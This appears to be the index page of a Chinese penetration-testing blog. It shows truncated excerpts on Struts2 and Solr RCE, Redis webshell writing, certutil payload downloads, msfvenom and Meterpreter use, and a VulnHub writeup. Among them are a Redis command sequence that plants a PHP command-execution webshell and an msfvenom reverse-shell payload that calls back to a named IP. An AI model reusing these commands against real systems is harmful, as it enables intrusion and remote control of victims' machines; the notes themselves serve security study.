struts2漏洞分析之S2-045
简介影响版本:2.3.31-2.3.5 2.5-2.5.10.1
漏洞原因:在处理上传文件的方法中,content-type中存在payload,处理错误并捕捉了异常信息(里面带有payload),后又OGNL解析
调试分析在获取action mapper前会对HttpServletReques
...
Apache_Solr_RCE利用脚本
发表于
|
分类于
渗透测试
Apache_Solr_RCE_via_Velocity最近Apache Solr爆出了一个RCE 0day漏洞,利用前提是存在未授权访问。原作者给出的POC如下:12345678910111213141516171819202122232425262728293031323334353637383
...
渗透测试笔记6-redis写shell
发表于
|
分类于
渗透测试
通过备份文件写shell1234567CONFIG SET dir /var/www/html CONGIG SET dbfilename shell.php SET shell "<?php system($_GET['cmd']);?>"
...
渗透测试笔记5-一句话下载payload
发表于
|
分类于
渗透测试
certutilCertutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储 和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件以及验证证书, 密钥对和证书链
下载默认下载后为bin文件,但不影响执行certutil.exe -urlc
...
渗透测试笔记4-msfvenom命令记录
发表于
|
分类于
渗透测试
有效命令msfvenom -p windows/x64/meterpreter/reverse_http lhost=114.116.33.191 lport=8888 -f exe>test_3.exemsfvenom -p windows/meterpreter/reverse_http
...
渗透测试笔记3-内网存活主机扫描
发表于
|
分类于
渗透测试
基于UDP简介UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的 上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报 文发送之后,是无法得知其是否安全完整到达的。
UDP特性:1.UDP 缺乏可靠性。UDP 本身
...
渗透测试笔记2-MSF常用模块记录
发表于
|
分类于
渗透测试
运行自动化脚本
msfconsole -r auto.rc
检测是否为虚拟机
post/windows/gather/checkvm
获取磁盘信息
windows/gather/forensics/enum_drives
补丁信息
run post/windows/gather/
...
渗透测试笔记1-Meterpreter后渗透
发表于
|
分类于
渗透测试
基本命令background将meterpreter终端隐藏在后台,msf可执行其它任务.
sessions查看已获取的会话,sessions -i 与某对话交互
quit关闭当前会话,返回msf终端
shell获取系统的控制台shell
reboot重新启动受害人的计算机
irb与ruby终端交互
...
DeDecms v5.7 sp2 CRSF+文件操作 前台getshell
在plus/search.php中:123456789101112131415161718192021222324252627282930313233if(empty($typeid)){ $typenameCacheFile = DEDEDATA.'/cache/type
...
VulnHub-Acid Server Writeup
发表于
|
分类于
渗透测试
目标Escalate the privileges to root and capture the flag. Once anyone able to beat the machine then please let me know.
信息收集端口扫描
nmap -p 1-65535 -T4 -A
...